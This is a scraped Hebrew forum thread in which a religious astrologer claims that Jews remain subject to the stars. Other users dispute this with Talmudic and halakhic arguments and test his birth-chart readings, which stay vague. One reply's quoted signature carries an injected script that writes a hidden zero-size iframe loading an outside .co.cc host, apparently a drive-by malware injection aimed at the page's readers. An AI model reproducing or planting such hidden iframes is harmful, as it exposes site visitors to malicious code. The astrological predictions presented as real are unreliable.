בית פורומים עצור כאן חושבים

עם ישראל מעל המזל - האומנם.

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-29/8/2011 23:42 לינק ישיר 
עם ישראל מעל המזל - האומנם.

שלום לכם,

אני בעל תשובה כבר כמה שנים, לומד תורה, עושה מצוות, שבת, תפילין, שמירת העיניים, ברכות, בקיצור חי לפי השולחן ערוך ומשתדל להיות יהודי כשר, ולהתרחק ממידות רעות... ואני גם אסטרולוג, למדתי את חוכמת הכוכבים כמה שנים ממקורות מהימנים לא האסטרולוגיה הרדודה והמוכרת מהעיתונים וההורסקופים השונים, משהו אחר..מדי פעם אפילו השתמשתי במקורות חז"ל. למדתי את זה גם לפני שחזרתי בתשובה וגם תוך כדי מהלך החזרה בתשובה שלי עסקתי בזה רבות, כמובן חזרתי בתשובה לא בגלל אינטרס אישי כלשהו להוכיח משהו ליהדות או לא, אלא כי הבנתי שזוהי האמת ואין בילתה, אך אחרי תקופה לא קצרה, התאכזבתי נורא לראות שאין שינוי במזל שלי, אני רגיל מימים לצפות ולחזות במעברי הכוכבים על המפה שלי מה שנקרא בשפה המקצועית "טרנזיסטים" ולראות את ההווה המתרחש במפה עצמה ומכך להבין את השיעורים שהקב"ה\העולם\החים..מה שתרצו ההשפעה מתי תסתיים ומה אני צריך ללמוד ממנה, כך הייתי עושה בעבר, חשבתי משום שאני חוזר בתשובה אני מעל המזל ובטח מהלכי חיי אינם מהשפעת הכוכבים כי חזרתי בתשובה ואני לא חי כמו גוי שאני נחשב כביכול לגוי, אז אני מסתכל במפה האסטרולוגית שלי ובמעברי הכוכבים במשך שנים ולמרות שאני חוזר בתשובה, ההשפעות ממערכת הכוכבים עדיין קיימות, תחושות ואירועים שאני חש על בשרי, אני יודע כל כוכב מה בדיוק מהותו איך הוא משפע במפת לידה או במעבר, לא צריך להכביר במילים, אני פשוט רואה שאני מושפע מהמזל.אפילו את תהליך החזרה בתשובה שלי עצמו אני רואה בכוכבים עצמם במפה שלי מאיפה התחיל ומאיזה בדיוק כוכב, דברים שהם מציאותיים לחלוטין, לכן אני חושב שהעניין שעם ישראל הוא מעל המזל אולי היה נכון לפעם..לדורות הקדמונים, שהם באמת היו מורמים מעם, אבל כיום הטומאה כל כך חזקה,יש ירידת הדורות, ורק יחידי סגולה עילויים וכדומה אולי מעל המזל או צדיקים גמורים מפורסמים שחיים או תלמידי חכמים שלומדים מהבוקר ועד הלילה אולי הם מעל המזל, אבל הבעל תשובה הפשוט, המתחזק, שלא נדבר על עמי ארצות, אפילו משפחות חרדיות, הם תחת המזל, בעבר פנתה אליי, בחורה שהיא רוצה שאני יבדוק במפה האסטרולוגית שלה מתי היא תכנס למדרשה כי היא נמצאת בתהלכי יציאה מהצבא והם עלו בתוהו..לא יודע איך היא הגיעה אליי אז, כנראה היתה נואשת, אבל בדקתי לה ונתתי לה תאריך משוער כמעט מדויק, ואכן צדקתי בדבריי והיא נכנסה בזמן שאמרתי למדרשה בשמחה רבה, אני לא יתחיל לפרט מה ראיתי במפות,אבל לא פעם ולא פעמיים צפיתי לחבר שגם חזר בתשובה וזכה להיות תלמיד ישיבה ולשקוד באוהלה של תורה במפה שלו בלי ידיעתו שסבל מבעיית עיכוב זיווג וראיתי הזדמנויות טובות שזה יפסק בתאריך כך וכך והמזל יפתח לו והוא יתחתן בחודש הזה בשנה כזו(לא על היום המדויק, אבל החודש והשנה) כמובן לא סיפרתי לו שלא יגידו אחר כך שזו נבואה שמגשימה את עצמה, וראיתי שהגיעו הזדמניות רבות באותה תקופה והוא התחתן !.. אז אני חושב לאחר מחקר וסבלנות רבה ובדיקה שבדורות שלנו לרוב העם חוץ מיחידי סגולה וצדיקים גמורים עם יחוס לא שייך להגיד "מעל המזל" אולי על ידי תפילה מעומק הלב או ריבוי צדקה, אדם באמת יכול להמתיק איזה דין אחד, אבל מהלך שלם של דרך הטבע, דרך הכוכבים, זה גרעין קשה מאוד שלא ניתן בקלות לצאת ממנו.

אז אני מצטער...לבשר לעולם החרדי את הבשורה הזו...אנחנו לא מעל המזל.

רק נקודת הבהרה - אני לא חושב שזה שאנחנו מושפעים מהמזל זה משהו רע וצריך לראות את זה באור שלילי
אחרי הכל הם שליחים, וזו גם דרך - של הקב''ה להנהיג את העולם. וצריך לקבל הכל באהבה, את הגזרות הטובות והרעות.
ולהוציא מעצמנו את הכי טוב מאיתנו.

דווח על תוכן פוגעני

נשלח ב-29/8/2011 23:57 לינק ישיר 

ג'ס

ברוך הבא אל הפורום!

סיפורך ארוך ומרתק.

יכול היית להביא מקורות מן התלמוד שמהם משמע שיש ממש באסטרולוגיה ומהם גם משמע שאין האסטרולוגיה קובעת עבור מי ששומר מצוות.

עם זאת, יתכן לפי חלק מהסוגיות שצריך מאמץ מיוחד כדי להתעלות "מעל למזל".

כך הוא המעשה בבתו של רבי עקיבא, שאסטרולוגים איימו על אביה שתמות ביום חופתה (לכאורה זה לא משנה מתי זה יהיה) ובאותו יום עשתה חסד, והאכילה עני רעב, ועל כן התבטלה הגזירה.

ויש עוד דוגמאות לזה.

אמנם סוגיות אלו מתבססות על אותה אמונה שאתה מציג לפנינו. שהאסטרולוגיה היא כלי שבו ניתן לדעת עתידות.

אם תבדוק בתולדות הפורום תגלה כי היו אשכולות בנושאים אלו. ויש כאלו, כמוני, שמפקפקים וסבורים כי האסטרולוגיה היא אמונת הבל מכל וכל. וזאת מהסיבות הבאות:

א. איך זה אמור לעבוד? איזה קשר סיבתי יש בין הסתדרות כוכבים בשמים לבין המתרחש בארץ?

ב. האם ה' ברא את העולם כך שיהיה קשר כזה? מאין לנו? ומדוע זה לא נזכר בתורה אם זה כך?

ג. יש פסוק בתורה שאוסר לעסוק בניחושים על העתיד לפי אסטרולוגיה ושיטות אחרות. (יש אפילו כמה. "לא תנחשו", "לא תעוננו").

ד. מהי האסטרולוגיה? הרי יש כה הרבה שיטות בזה...

לפיכך, אם אתה רוצה להציג דוגמא לפרי עבודתך, כלומר תאריך לידה של פלוני עם ניתוח של מה שחייב לקרות לו, ואז הבאת דוגמאות שמעידות שזה אכן קרה לו, זה יאפשר לראות דוגמא והוכחה אחת לטענותיך.

עד אז, אני סבור שאני יכול לומר בלב שלם: גם אם השקעת שנים בלימוד הזה, אשריך שזכית להתקרב לאמת ולדת האמת ועכשו תוכל לגלות שאין ממש באמונות הבל אלו!

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-30/8/2011 00:09 לינק ישיר 

אני לא מסכימה עם הדעה שלך.

אתה לא יכול להחליט על דעת עצמך מה נכון לדור שלנו ומה לדורות הקודמים. ומכיוון שכך, כל עוד וחכמים לא קבעו שזה נכון רק לתקופה מסויימת, זה רלוונטי לכל התקופות.
מעבר לכך, יש לנו (בשונה להבדיל מהגויים) בחירה חופשית. שזה אומר, שבכוחנו לשנות את מה "שנכתב". ולכן, גם אם "ראית"  שכך  וכך יהיה עם פלוני, תמיד בכוחו לשנות את זה. וזה שמה "שראית" מתרחש, לא סותר את זה שיהודי הוא מעל המזל.
אם דבר אחד  אני מסכימה איתך. והוא, שצריך לקבל באהבה את כל מה שמתרחש עימנו, כי הרי אין רע יורד מלמעלה ולכן הכל טוב, רק יש טוב שהוא צפון ונראה בעינינו כרע.

דדווח על תוכן פוגעני

נשלח ב-30/8/2011 00:18 לינק ישיר 

מיימוני כתב:
ג'ס

ברוך הבא אל הפורום!

סיפורך ארוך ומרתק.

יכול היית להביא מקורות מן התלמוד שמהם משמע שיש ממש באסטרולוגיה ומהם גם משמע שאין האסטרולוגיה קובעת עבור מי ששומר מצוות.

עם זאת, יתכן לפי חלק מהסוגיות שצריך מאמץ מיוחד כדי להתעלות "מעל למזל".

כך הוא המעשה בבתו של רבי עקיבא, שאסטרולוגים איימו על אביה שתמות ביום חופתה (לכאורה זה לא משנה מתי זה יהיה) ובאותו יום עשתה חסד, והאכילה עני רעב, ועל כן התבטלה הגזירה.

ויש עוד דוגמאות לזה.

אמנם סוגיות אלו מתבססות על אותה אמונה שאתה מציג לפנינו. שהאסטרולוגיה היא כלי שבו ניתן לדעת עתידות.

אם תבדוק בתולדות הפורום תגלה כי היו אשכולות בנושאים אלו. ויש כאלו, כמוני, שמפקפקים וסבורים כי האסטרולוגיה היא אמונת הבל מכל וכל. וזאת מהסיבות הבאות:

א. איך זה אמור לעבוד? איזה קשר סיבתי יש בין הסתדרות כוכבים בשמים לבין המתרחש בארץ?

ב. האם ה' ברא את העולם כך שיהיה קשר כזה? מאין לנו? ומדוע זה לא נזכר בתורה אם זה כך?

ג. יש פסוק בתורה שאוסר לעסוק בניחושים על העתיד לפי אסטרולוגיה ושיטות אחרות. (יש אפילו כמה. "לא תנחשו", "לא תעוננו").

ד. מהי האסטרולוגיה? הרי יש כה הרבה שיטות בזה...

לפיכך, אם אתה רוצה להציג דוגמא לפרי עבודתך, כלומר תאריך לידה של פלוני עם ניתוח של מה שחייב לקרות לו, ואז הבאת דוגמאות שמעידות שזה אכן קרה לו, זה יאפשר לראות דוגמא והוכחה אחת לטענותיך.

עד אז, אני סבור שאני יכול לומר בלב שלם: גם אם השקעת שנים בלימוד הזה, אשריך שזכית להתקרב לאמת ולדת האמת ועכשו תוכל לגלות שאין ממש באמונות הבל אלו!

שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

ראשית כל, תודה על קבלת הפנים החמה

כל מה שאני למדתי באסטרולוגיה כתוב בספרים הקדושים שלנו. אך משמים "גנזו את הספר" ורוב הידע שהיה לחכמינו בימי קדם נעלם בדורנו מהעוסקים בתחום.

בחסדי שמים נחשפתי לנושא לפני למעלה מעשרים שנה כאשר התחלתי ללמוד בארכיון של הספריה הלאומית בירושלים. נמצאים שם כתבי יד עבריים עתיקים וגם צילומים של כתבי יד עבריים שמוחזקים בספריות השונות בעולם.

נפלאות הבריאה רואים במשפטי הכוכבים שנבראו ביום הרביעי לבריאת העולם.

לגבי השיטות, רוב הידע האסטרולוגי אבד בדורנו ולכן האסטרולוגים היום צריכים ללמוד מחדש את השפעתם של מרבית הכוכבים. בנוסף ליב' המזלות וז' כוכבי הלכת העיקריים יש רבבות כוכבים גמדיים וכוכבים קבועים שלפיהם ניתן לראות באופן ממוקד מצבים שונים. הקדמונים הכירו את כל סודות הכוכבים השונים אך הידע הזה הוא היום נחלתם של קומץ מקובלים נסתרים שאין לציבור הרחב גישה אליהם.

דע אתה המעין שכאשר ברא הקב"ה את העולם, נתן כח בכוכבים למשול בארץ ולהנהיגה. וחילק הארצות לשבעה כוכבי לכת וכל כוכב מקבל ביחוד שפע ממדרגה מלאכית מיוחדת (שבילי אמונה)

נ.ב
יש משהו שחשוב לציין,
שרבנים גדולים בני זמנינו כמו הרב יאשיהו פינטו ורבים אחרים
שמעתי שאומרים שקשה מאוד מאוד לצאת מן דרך הכוכבים
והעניין של מעל המזל הוא בעירבון מוגבל מאוד לדורנו זה
וגם שאסטרולוגיה זה אמת אבל אין היום אסטרולוגים ברמה שהיתה פעם
וזו הדעת האמיתית והמסתברת למנוסים ולעתיד גם הרווחת.

אם אתה רוצה לנסות הגש לי נא בהודעה פרטית את פרטי יום הולדתך כולל שעת לידה מדויקת ובקש ממני איזה סוג אינפורמציה שתרצה. (לא חייב עתיד אפשר על ההווה)

דדווח על תוכן פוגעני

נשלח ב-30/8/2011 00:28 לינק ישיר 

טוהרי כתב:
אני לא מסכימה עם הדעה שלך.

אתה לא יכול להחליט על דעת עצמך מה נכון לדור שלנו ומה לדורות הקודמים. ומכיוון שכך, כל עוד וחכמים לא קבעו שזה נכון רק לתקופה מסויימת, זה רלוונטי לכל התקופות.
מעבר לכך, יש לנו (בשונה להבדיל מהגויים) בחירה חופשית. שזה אומר, שבכוחנו לשנות את מה "שנכתב". ולכן, גם אם "ראית"  שכך  וכך יהיה עם פלוני, תמיד בכוחו לשנות את זה. וזה שמה "שראית" מתרחש, לא סותר את זה שיהודי הוא מעל המזל.
אם דבר אחד  אני מסכימה איתך. והוא, שצריך לקבל באהבה את כל מה שמתרחש עימנו, כי הרי אין רע יורד מלמעלה ולכן הכל טוב, רק יש טוב שהוא צפון ונראה בעינינו כרע.

שלום רב,
לכל הדעות העולם מונהג על - ידי ההשגחה לפי מזלות - טבע..
אבל כאשר משתנה מצב זכויותיו של האדם, ישנו גם את המזל.

שלמה המלך אומר בקהלת פרק ג' "לכל זמן ועת לכל חפץ תחת השמים"
יש עת וזמן לכל דבר תחת השמים, קרי, תחת מערכת הכוכבים.
אי אפשר להתכחש לעובדה הזאת.

איני מנסה לכפות עלייך את הדעה שלי או משהו.

דדווח על תוכן פוגעני

נשלח ב-30/8/2011 00:32 לינק ישיר 

ולמה לי נדמה שהמצב הפוך? מעל המזל קיים וקיים, ורק האסטרולוגיה לא עובדת היום כמו שצריך.....?

אני מוכן לבדוק את זה גם בפומבי כאן. נולדתי ב06/07.89.01:30
עכשיו תגיד לי דבר אחד עלי שאתה יודע מתוך האסטרולוגיה.

דדווח על תוכן פוגעני

נשלח ב-30/8/2011 00:38 לינק ישיר 

יהיאור כתב:
ולמה לי נדמה שהמצב הפוך? מעל המזל קיים וקיים, ורק האסטרולוגיה לא עובדת היום כמו שצריך.....?

אני מוכן לבדוק את זה גם בפומבי כאן. נולדתי ב06/07.89.01:30
עכשיו תגיד לי דבר אחד עלי שאתה יודע מתוך האסטרולוגיה.

אני לא בא בשם האסטרולוגיה וכדי להוכיח משהו.
השיטה שלמדתי יותר קרובה למה שידעו חכמינו ז"ל
מאשר לאסטרולוגיה המודרנית הידועה.

אתה בטוח שזה התאריך , במשתמש שלך רשום 24.6.84

דדווח על תוכן פוגעני

נשלח ב-30/8/2011 00:40 לינק ישיר 

ברור שהעולם מנוהל ע"י השגחה. אך, ליהודי יש את האפשרות לשנות אותה (מה שלגוי אין ). ולכן אנחנו מעל המזל.

דדווח על תוכן פוגעני

נשלח ב-30/8/2011 00:42 לינק ישיר 

jes899 כתב:

מה, חשבת שאכתוב שם התאריך האמיתי?

דדווח על תוכן פוגעני

נשלח ב-30/8/2011 00:44 לינק ישיר 

יהיאור כתב:

מה, חשבת שאכתוב שם התאריך האמיתי?

טוב אז נולדת ב6 ליולי 1989 בשעה 1 וחצי בלילה?

דדווח על תוכן פוגעני

נשלח ב-30/8/2011 00:48 לינק ישיר 

לא. נולדתי ב5 ביוני 89 בשעה 11 בלילה.

דדווח על תוכן פוגעני

נשלח ב-30/8/2011 00:50 לינק ישיר 

יהיאור כתב:
לא. נולדתי ב4 ביוני 89 בשעה 11 בלילה.

סליחה על הבלבול. תכלית זה 4 ביוני 89 וו בלילה.

תוקן על ידי יהיאור ב- 30/08/2011 00:54:30

דדווח על תוכן פוגעני

נשלח ב-30/8/2011 01:21 לינק ישיר 

טוב אני שולף מהמותן ממה שאני רואה פה.

אדם ספונטני סקרן ופעיל ללא הרף ובעל יכולת ביטוי נפלאה.
רואה את ההווה ואת העבר בצורה אובייקטיבית ולא סובייקטיבית.
יש מקום להוראה, ללמד. אדם עם צורך בתקשורת וקשרי-גומלין מוגברים.
בהליך המחשבה שלך, אתה סבלן בעל יכולת להקשיב לאורך זמן ומבטא דעתך בסבלנות ובאריכות.
יש באופן החשיבה שלך עיקשות מסוימת ואתה לא תמיד גמיש עם השינויים המהירים המתרחשים סביבך.

להמשיך?

תוקן על ידי jes899 ב- 30/08/2011 01:22:52

דדווח על תוכן פוגעני

נשלח ב-30/8/2011 01:37 לינק ישיר 

תמשיך בהחלט [בינתיים כל מה שאתה כותב ניתן לראות מהודעותי בפורום]
תנסה להגיד משהו קונקרטי שניתן לבחון בכלים גשמיים [לא רק תכונות ומדות]

דדווח על תוכן פוגעני

נשלח ב-30/8/2011 01:45 לינק ישיר 

מותניים ארוכות. הליכה ייחודית ומוזרה. ראש עגול עם פנים ארוכות. חלקו האחורי של הראש בולט ורחב. שיער חזק, גלי ומבריק. גבות במקצת קעורות, בעלות צורה יאה. מצח רחב/מלא. שיניים יפות ולבנות. גבוה.

תוקן על ידי jes899 ב- 30/08/2011 01:47:29

דדווח על תוכן פוגעני

נשלח ב-30/8/2011 01:48 לינק ישיר 

אני לא יודע בדיוק איך לבדוק אורך מותניים וכדומה. אז אני לא יודע אם אמת או לא. לגבי שיניים לבנות אז בהחלט לא נכון [זה תלוי אם מצחצחים אותם. אני לצערי לא מקפיד על זה מספיק. ]
תגיד משהו על מצב משפחתי, הצלחה בחברה, וכדומה. [המצב העכשוי, תוכל גם עתידות]

על מצב כלכלי בהווה, בעתיד.

תוקן על ידי יהיאור ב- 30/08/2011 01:56:09

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > עם ישראל מעל המזל - האומנם.
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
1 2 3 לדף הבא סך הכל 3 דפים.

bholext